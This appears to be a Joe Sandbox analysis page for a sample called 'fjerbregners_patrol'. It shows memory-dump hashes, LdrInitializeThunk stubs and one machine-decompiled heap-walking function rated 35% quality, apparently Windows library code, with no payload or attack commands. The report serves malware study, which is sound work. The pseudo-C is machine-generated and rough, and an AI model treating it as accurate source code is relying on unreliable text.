                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: f4a69837a78ee827dea5e7798c41e58558e36471d1f8d354ece49f4cf41919e0
                                                                                                                                                                                            • Instruction ID: 1c52be47bd250c47705f5cce821a3c124cab09b5f09d4ccc0912058a84a263f8
                                                                                                                                                                                            • Opcode Fuzzy Hash: f4a69837a78ee827dea5e7798c41e58558e36471d1f8d354ece49f4cf41919e0
                                                                                                                                                                                            • Instruction Fuzzy Hash: B390026138100842D50075589514B06000587E1342F51C41AE1054524DCA2ACC567226
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 12 33d32dc0-33d32dcc LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 6bbf064549800bbd6ff59be071076a7b5d0a205351a646d24ace1ed5abe4b775
                                                                                                                                                                                            • Instruction ID: 232766ba3740fb7a748a7946875a8023af98147d45c35740666ebb14a804e641
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bbf064549800bbd6ff59be071076a7b5d0a205351a646d24ace1ed5abe4b775
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A90027124100802D54075589504746000547D0342F51C416A5054524ECA6A8DD97765
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 11 33d32da0-33d32dac LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: bc13603183008f16feeb6ec4e575a6ab427d9f12adaf3eb70968ff4e894a8b5b
                                                                                                                                                                                            • Instruction ID: 9d1ca122b4383beb2bb15ca5bef7f5c0e228111f0c3257aadb29d6f5c13bc161
                                                                                                                                                                                            • Opcode Fuzzy Hash: bc13603183008f16feeb6ec4e575a6ab427d9f12adaf3eb70968ff4e894a8b5b
                                                                                                                                                                                            • Instruction Fuzzy Hash: A590022164100902D50175589504616000A47D0282F91C427A1014525ECE368996B231
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 10 33d32d10-33d32d1c LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 182bd1621407c5b36b89692a13fbdafd8b44a7b6bc669dba789a8347b73f51b3
                                                                                                                                                                                            • Instruction ID: 3790a61f5d0a18ae295e560ce585dbfd85ef23f274618376e310fba38a19c39e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 182bd1621407c5b36b89692a13fbdafd8b44a7b6bc669dba789a8347b73f51b3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1990023124100813D51175589604707000947D0282F91C817A0414528DDA678956B221
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 9 33d32cf0-33d32cfc LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: b33397c89d2151609dfc17c4c9b26bbcbbffeaca467d85d2b7efe25e280fcebe
                                                                                                                                                                                            • Instruction ID: 41fa5d26df6594954741919e0dcad89913da5282396c62995b00cdec41aff0b2
                                                                                                                                                                                            • Opcode Fuzzy Hash: b33397c89d2151609dfc17c4c9b26bbcbbffeaca467d85d2b7efe25e280fcebe
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D900221282045525945B5589504507400657E0282791C417A1404920CC937985AE721
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 8 33d32c30-33d32c3c LdrInitializeThunk
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: 514bec05c2f58ece86710c838909cdfa2f944b9b75691e7411ddcd6000941264
                                                                                                                                                                                            • Instruction ID: 97a1152bd106d59505fd0527d044032e69e917a8b8ade709b04f9224deb74e66
                                                                                                                                                                                            • Opcode Fuzzy Hash: 514bec05c2f58ece86710c838909cdfa2f944b9b75691e7411ddcd6000941264
                                                                                                                                                                                            • Instruction Fuzzy Hash: C190022925300402D5807558A50860A000547D1243F91D81AA0005528CCD26886D6321
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D32B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 0 33d32b2a-33d32b2f 1 33d32b31-33d32b38 0->1 2 33d32b3f-33d32b46 LdrInitializeThunk 0->2
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                            • Opcode ID: f3a504ec7e4406a486583fa94aa0e57c518893cd181635a66906b22b3476329d
                                                                                                                                                                                            • Instruction ID: 471c73271fce97640e7bf753f4257ae111c0f163cabaa8dca6d41ec915b3e929
                                                                                                                                                                                            • Opcode Fuzzy Hash: f3a504ec7e4406a486583fa94aa0e57c518893cd181635a66906b22b3476329d
                                                                                                                                                                                            • Instruction Fuzzy Hash: A0B09B71D424C5C5E601EB609708707790467D1751F15C456D2460651E8739C595F275
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 33D99060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 35%
                                                                                                                                                                                            			E33D99060(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v18;
				short _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v184;
				signed int _v188;
				short _v190;
				short _v192;
				signed int _v196;
				signed int _v198;
				signed int _v200;
				signed int _v204;
				signed int _v206;
				void _v208;
				signed int* _v212;
				signed int _v214;
				void* _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				char _v233;
				char _v236;
				signed int _v240;
				signed int _v241;
				intOrPtr* _v244;
				intOrPtr _v248;
				signed int _v249;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t299;
				signed int _t310;
				signed int _t315;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				char* _t323;
				signed int _t325;
				signed int _t329;
				signed int _t333;
				signed int* _t334;
				signed int _t349;
				signed int _t352;
				signed int _t357;
				signed int _t367;
				signed int _t373;
				intOrPtr _t422;
				signed int _t423;
				signed int _t424;
				void* _t427;
				signed int _t429;
				signed int _t431;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr _t444;
				signed int _t448;
				signed int _t452;
				void _t458;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t472;
				intOrPtr _t475;
				intOrPtr _t478;
				signed int _t480;
				intOrPtr* _t484;
				void* _t485;
				intOrPtr _t488;
				intOrPtr _t489;
				signed int _t492;
				signed int _t495;
				signed int _t496;
				signed int _t499;
				void* _t500;
				signed int _t501;
				signed int _t503;

				_t503 = (_t501 & 0xfffffff8) - 0xec;
				_v8 =  *0x33deb370 ^ _t503;
				_t299 = _a8;
				_t499 = _a4;
				_t434 = 0;
				_t482 =  *_t299;
				_t484 =  *((intOrPtr*)(_t299 + 4));
				_v204 = _t482;
				_v232 =  *((intOrPtr*)(_t299 + 8));
				_v228 = _t484;
				_v68 = 0;
				if( *((intOrPtr*)(_t499 + 8)) != 0xddeeddee) {
					__eflags =  *(_t499 + 0x44) & 0x01000000;
					_v233 = 0;
					_v212 = 0;
					if(( *(_t499 + 0x44) & 0x01000000) == 0) {
						goto L2;
					} else {
						_t310 = 0xc0000002;
						goto L98;
					}
				} else {
					_v233 = 1;
					_v212 = _t499;
					L2:
					if(_t482 != 0x80000000) {
						L33D38F40( &_v156, _t434, 0x54);
						_t503 = _t503 + 0xc;
						_v172 = 2;
						_v168 = 0x20;
						_v164 = _t499;
						__eflags = _v233 - _t434;
						if(_v233 != _t434) {
							_t444 = _v212;
							_v160 = _t434;
							_v156 =  *(_t444 + 0x80) << 0xc;
							_v156 = _v156 + ( *(_t444 + 0x4c) << 0xc);
							_v152 =  *(_t444 + 0x84) << 0xc;
							_t81 =  &_v152;
							 *_t81 = _v152 + ( *(_t444 + 0x50) << 0xc);
							__eflags =  *_t81;
							_t310 = _t434;
						} else {
							_t482 =  &_v156;
							_v160 =  *(_t499 + 0xea) & 0x000000ff;
							_t310 = E33D998AA(_t499,  &_v156,  &_v152);
						}
						__eflags = _t310;
						if(_t310 < 0) {
							L98:
							_pop(_t485);
							_pop(_t500);
							_pop(_t435);
							return L33D34B50(_t310, _t435, _v8 ^ _t503, _t482, _t485, _t500);
						} else {
							 *0x33de91e0( &_v172, _v232);
							_t310 =  *_t484();
							__eflags = _t310;
							if(_t310 < 0) {
								goto L98;
							}
							_t482 = _v212;
							__eflags = _t482 - 3;
							if(_t482 < 3) {
								goto L98;
							}
							_v232 = _t434;
							__eflags = _t482 - 3;
							_v228 = _t434;
							_t448 = 7;
							_t315 = memset( &_v208, 0, _t448 << 2);
							_t503 = _t503 + 0xc;
							_t316 = _t315 & 0xffffff00 | __eflags > 0x00000000;
							_t488 = 0;
							__eflags = 0;
							_v224 = _t316;
							while(1) {
								_t482 =  &_v208;
								_t310 = E33D9A388(_t499,  &_v208, _t316);
								__eflags = _t310 - 0x8000001a;
								if(_t310 == 0x8000001a) {
									break;
								}
								__eflags = _t310;
								if(_t310 < 0) {
									goto L98;
								}
								_t436 = _v198;
								__eflags = _t436 & 0x00000002;
								if((_t436 & 0x00000002) == 0) {
									__eflags = _t436 & 0x00004000;
									if((_t436 & 0x00004000) == 0) {
										__eflags = _t436 & 0x00001000;
										if((_t436 & 0x00001000) == 0) {
											__eflags = _v241;
											if(_v241 != 0) {
												L75:
												__eflags = _v212 - 4;
												_t316 = _v224;
												if(_v212 < 4) {
													continue;
												}
												L76:
												__eflags = _t436 & 0x000000f0;
												if((_t436 & 0x000000f0) == 0) {
													L33D38F40( &_v180, _t488, 0x64);
													_t503 = _t503 + 0xc;
													_v172 = _v208;
													_v164 = _v204;
													_t321 = _v188;
													_v180 = 5;
													_v176 = 0x1c;
													__eflags = _t436 & 0x00000002;
													if((_t436 & 0x00000002) != 0) {
														_t321 = _v200 & 0x000000ff;
													}
													_v160 = _t321;
													__eflags = _t436 & 0x00000001;
													if((_t436 & 0x00000001) == 0) {
														_t322 = _v168;
													} else {
														_t322 = 1;
														_v168 = 1;
													}
													__eflags = _t436 & 0x00004000;
													if((_t436 & 0x00004000) == 0) {
														__eflags = _t436 & 0x00008000;
														if((_t436 & 0x00008000) == 0) {
															goto L94;
														}
														_t325 = _t322 | 0x00000008;
														__eflags = _t325;
														goto L93;
													} else {
														_t325 = _t322 | 0x00000004;
														L93:
														_v168 = _t325;
														L94:
														_t323 =  &_v180;
														L95:
														 *0x33de91e0(_t323, _v240);
														_t310 =  *_v236();
														__eflags = _t310;
														if(_t310 < 0) {
															goto L98;
														}
														L96:
														_t316 = _v232;
														continue;
													}
												}
												_t452 = _v188;
												_v56 = _v208;
												_v48 = _v204;
												_t329 = 2;
												_v40 = _t488;
												_v36 = _t488;
												_v64 = 5;
												_v60 = 0x30;
												_v52 = _t329;
												__eflags = _t329 & _t436;
												if((_t329 & _t436) != 0) {
													_t452 = _v200 & 0x000000ff;
												}
												_v44 = _t452;
												__eflags = _t436 & 0x00004000;
												if((_t436 & 0x00004000) != 0) {
													_t329 = 6;
													_v52 = _t329;
												}
												__eflags = _t436 & 0x00000001;
												if((_t436 & 0x00000001) != 0) {
													_t333 = _t329 | 0x00000001;
													__eflags = _t333;
													_v52 = _t333;
												}
												_v24 = _v196;
												_v20 = _v192;
												_v18 = _v190;
												_t323 =  &_v64;
												_v32 = 1;
												_v28 = 0x14;
												goto L95;
											}
											_t334 = _v208;
											__eflags = _t334 - _v232;
											if(_t334 < _v232) {
												L72:
												_t482 = _t334;
												E33D98093(_v76, _t334,  &_v232,  &_v228,  &_v68,  &_v216);
												__eflags = _v228 - 4;
												if(_v228 < 4) {
													goto L96;
												}
												L33D38F40( &_v180, _t488, 0x64);
												_t458 = _v232;
												_t503 = _t503 + 0xc;
												_v168 = _v228 - _t458;
												_v160 = _v216;
												_v172 = _t458;
												_v180 = 4;
												_v176 = 0x20;
												_v164 = 1;
												 *0x33de91e0( &_v180, _v240);
												_t310 =  *_v236();
												__eflags = _t310;
												if(_t310 < 0) {
													goto L98;
												}
												_t436 = _v206;
												goto L75;
											}
											__eflags = _t334 - _v228;
											if(_t334 <= _v228) {
												goto L75;
											}
											goto L72;
										}
										__eflags = _v212 - 4;
										_t316 = _v224;
										if(_v212 < 4) {
											continue;
										}
										L33D38F40( &_v180, _t488, 0x64);
										_t503 = _t503 + 0xc;
										_v172 = _v208;
										_t325 = _v204;
										_v180 = 4;
										_v176 = 0x20;
										_v164 = 2;
										_v160 = 1;
										goto L93;
									}
									L33D38F40( &_v172, 0, 0x5c);
									_t503 = _t503 + 0xc;
									_v180 = 3;
									_t496 = 0;
									_v176 = 0x1c;
									_v72 = 0;
									__eflags = _v241;
									if(_v241 != 0) {
										_t482 = _v208;
										_t349 = _v220 + 0x44;
										_v172 = _t482;
										__eflags =  *(_t349 + 4) & 0x00000001;
										_t496 =  *_t349;
										if(( *(_t349 + 4) & 0x00000001) != 0) {
											__eflags = _t496;
											if(_t496 == 0) {
												_t496 = 0;
											} else {
												_t496 = _t496 ^ _t349;
											}
										}
										_t461 =  *(_t349 + 4) & 1;
										while(1) {
											__eflags = _t496;
											if(_t496 == 0) {
												break;
											}
											__eflags = _t482 - ( *(_t496 + 0xc) & 0xffff0000);
											if(__eflags < 0) {
												_t352 =  *_t496;
												L54:
												__eflags = _t461;
												if(_t461 == 0) {
													L57:
													_t496 = _t352;
													continue;
												}
												__eflags = _t352;
												if(_t352 == 0) {
													goto L57;
												}
												_t496 = _t496 ^ _t352;
												continue;
											}
											if(__eflags <= 0) {
												break;
											}
											_t352 =  *(_t496 + 4);
											goto L54;
										}
										_v168 = ( *(_t496 + 0x10) & 0xfffff000) + 0x1000;
										_t357 =  *(_t496 + 0x10) & 0xfffff000;
										__eflags = _t357;
										L60:
										_v164 = _t357;
										 *0x33de91e0( &_v180, _v240);
										_t310 = _v236();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										L33D38F40( &_v176, 0, 0x58);
										_t503 = _t503 + 0xc;
										_v184 = 0x20;
										_t464 = 4;
										_v188 = _t464;
										__eflags = _v249;
										if(_v249 != 0) {
											_v180 = _v216;
											_v176 =  *(_t496 + 0x10) & 0xfffff000;
											_t367 =  *(_v228 + 0xc) & 0x40000000;
											__eflags = _t367;
										} else {
											_t373 = _v80;
											_v180 = _t373;
											_v176 =  *((intOrPtr*)(_t373 + 0x10));
											_t367 =  *(_t499 + 0x40) & 0x00040000;
										}
										_v172 = 1;
										asm("sbb eax, eax");
										_v168 = ( ~_t367 & 0x0000003c) + _t464;
										 *0x33de91e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										} else {
											_t436 = _v214;
											_t488 = 0;
											goto L76;
										}
									}
									_t467 = _v208 + 0xfffffff8;
									__eflags =  *((char*)(_t467 + 7)) - 5;
									if( *((char*)(_t467 + 7)) == 5) {
										_t467 = _t467 - (( *(_t467 + 6) & 0x000000ff) << 3);
										__eflags = _t467;
									}
									_t468 = _t467 + 0xffffffe8;
									_v72 = _t468;
									_v172 = _t468 & 0xffff0000;
									_v168 =  *((intOrPtr*)(_t468 + 0x14));
									_t357 =  *(_t468 + 0x10);
									goto L60;
								}
								__eflags = _v241;
								if(_v241 != 0) {
									L30:
									_t489 = _v208;
									L31:
									L33D38F40( &_v160, 0, 0x50);
									_t469 = _v196;
									_t503 = _t503 + 0xc;
									_v172 = _t489;
									_v168 = _v192 + _t469;
									_v164 = _t469;
									_v180 = 3;
									_v176 = 0x1c;
									 *0x33de91e0( &_v180, _v240);
									_t310 =  *_v236();
									__eflags = _t310;
									if(_t310 < 0) {
										goto L98;
									}
									__eflags = _v249;
									if(_v249 != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_v228 + 0xc) & 0x40000000;
										__eflags = _t492;
										L37:
										_v240 = _t471;
										asm("sbb edi, edi");
										_t495 = ( ~_t492 & 0x0000003c) + 4;
										__eflags = _t495;
										_v224 = _t495;
										L38:
										L33D38F40( &_v188, 0, 0x64);
										_t472 = _v240;
										_t503 = _t503 + 0xc;
										_v176 = _v236 - _t472;
										_v180 = _t472;
										_v188 = 4;
										_v184 = 0x20;
										_v172 = 1;
										_v168 = _t495;
										 *0x33de91e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										_t488 = 0;
										goto L96;
									}
									__eflags = _v206 & 0x00008000;
									if((_v206 & 0x00008000) != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_t499 + 0x40) & 0x00040000;
										goto L37;
									}
									_t482 = _v84;
									E33D98093(_v84, _v84,  &_v240,  &_v236,  &_v76,  &_v224);
									_t495 = _v240;
									goto L38;
								}
								__eflags = _t436 & 0x00008000;
								if((_t436 & 0x00008000) != 0) {
									goto L30;
								}
								_t475 = _v208;
								_v76 = _t475;
								__eflags = _t475 + 0x10 -  *((intOrPtr*)(_t499 + 0xa4));
								if(_t475 + 0x10 !=  *((intOrPtr*)(_t499 + 0xa4))) {
									_t489 = _t475;
								} else {
									_t489 = _t499;
								}
								goto L31;
							}
							_t310 = 0;
							__eflags = 0;
							goto L98;
						}
					}
					L33D38F40( &_v164, _t434, 0x5c);
					_t503 = _t503 + 0xc;
					_v172 = 0x80000000;
					_v168 = 0x64;
					if(_v233 == _t434) {
						_v156 =  *(_t499 + 0x7c) & 0x0000ffff;
						_v160 = 1;
						_v148 = _t499;
						_v152 =  *((intOrPtr*)( *[fs:0x30] + 0x88)) - 1;
						_v144 =  *((intOrPtr*)(_t499 + 0x1f4));
						_v140 =  *((intOrPtr*)(_t499 + 0x1f8)) -  *((intOrPtr*)(_t499 + 0x244));
						_v124 = E33D9D7E5(_t499);
						_v120 =  *(_t499 + 0x74) << 3;
						_v128 =  *((intOrPtr*)(_t499 + 0x208));
						_v108 =  *((intOrPtr*)(_t499 + 0x200));
						_v132 =  *((intOrPtr*)(_t499 + 0x1fc));
						_v136 =  *((intOrPtr*)(_t499 + 0x204));
						_t422 =  *((intOrPtr*)(_t499 + 0x20c));
						_v104 = _t422;
						_v100 = _t422;
						_t423 =  *(_t499 + 0xb4);
						__eflags = _t423;
						if(_t423 != 0) {
							_t480 =  *((intOrPtr*)(_t423 + 0xc));
							_v116 = _t480;
							_t429 =  *_t423;
							__eflags = _t429;
							if(_t429 != 0) {
								_t431 =  *((intOrPtr*)(_t429 + 0xc)) + _t480;
								__eflags = _t431;
								_v116 = _t431;
							}
						}
						_t424 =  *(_t499 + 0xc8);
						_t478 =  *((intOrPtr*)(_t499 + 0x218));
						_v112 = _t478;
						__eflags = _t424;
						if(_t424 != 0) {
							_t427 =  *_t424;
							__eflags = _t427 - 0xffffffff;
							if(_t427 != 0xffffffff) {
								_t434 =  *(_t427 + 0x14);
							}
							_v112 = _t478 + _t434;
						}
					} else {
						_t482 =  &_v172;
						E33DB92AB(_v212,  &_v172);
					}
					 *0x33de91e0( &_v172, _v232);
					_t310 =  *_t484();
					goto L98;
				}
			}
























































































































                                                                                                                                                                                            0x33d99068
                                                                                                                                                                                            0x33d99075
                                                                                                                                                                                            0x33d9907c
                                                                                                                                                                                            0x33d99081
                                                                                                                                                                                            0x33d99084
                                                                                                                                                                                            0x33d99086
                                                                                                                                                                                            0x33d99093
                                                                                                                                                                                            0x33d99096
                                                                                                                                                                                            0x33d9909a
                                                                                                                                                                                            0x33d9909e
                                                                                                                                                                                            0x33d990a2
                                                                                                                                                                                            0x33d990a9
                                                                                                                                                                                            0x33d990f8
                                                                                                                                                                                            0x33d990ff
                                                                                                                                                                                            0x33d99103
                                                                                                                                                                                            0x33d99107
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99109
                                                                                                                                                                                            0x33d99109
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99109
                                                                                                                                                                                            0x33d990ab
                                                                                                                                                                                            0x33d990ab
                                                                                                                                                                                            0x33d990b0
                                                                                                                                                                                            0x33d990b4
                                                                                                                                                                                            0x33d990ba
                                                                                                                                                                                            0x33d9921d
                                                                                                                                                                                            0x33d99222
                                                                                                                                                                                            0x33d99225
                                                                                                                                                                                            0x33d9922d
                                                                                                                                                                                            0x33d99235
                                                                                                                                                                                            0x33d99239
                                                                                                                                                                                            0x33d9923d
                                                                                                                                                                                            0x33d9925c
                                                                                                                                                                                            0x33d99260
                                                                                                                                                                                            0x33d9926d
                                                                                                                                                                                            0x33d99277
                                                                                                                                                                                            0x33d99284
                                                                                                                                                                                            0x33d9928e
                                                                                                                                                                                            0x33d9928e
                                                                                                                                                                                            0x33d9928e
                                                                                                                                                                                            0x33d99292
                                                                                                                                                                                            0x33d9923f
                                                                                                                                                                                            0x33d99246
                                                                                                                                                                                            0x33d9924a
                                                                                                                                                                                            0x33d99255
                                                                                                                                                                                            0x33d99255
                                                                                                                                                                                            0x33d99294
                                                                                                                                                                                            0x33d99296
                                                                                                                                                                                            0x33d99893
                                                                                                                                                                                            0x33d9989a
                                                                                                                                                                                            0x33d9989b
                                                                                                                                                                                            0x33d9989c
                                                                                                                                                                                            0x33d998a7
                                                                                                                                                                                            0x33d9929c
                                                                                                                                                                                            0x33d992a7
                                                                                                                                                                                            0x33d992ad
                                                                                                                                                                                            0x33d992af
                                                                                                                                                                                            0x33d992b1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d992b7
                                                                                                                                                                                            0x33d992bb
                                                                                                                                                                                            0x33d992be
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d992c6
                                                                                                                                                                                            0x33d992cc
                                                                                                                                                                                            0x33d992cf
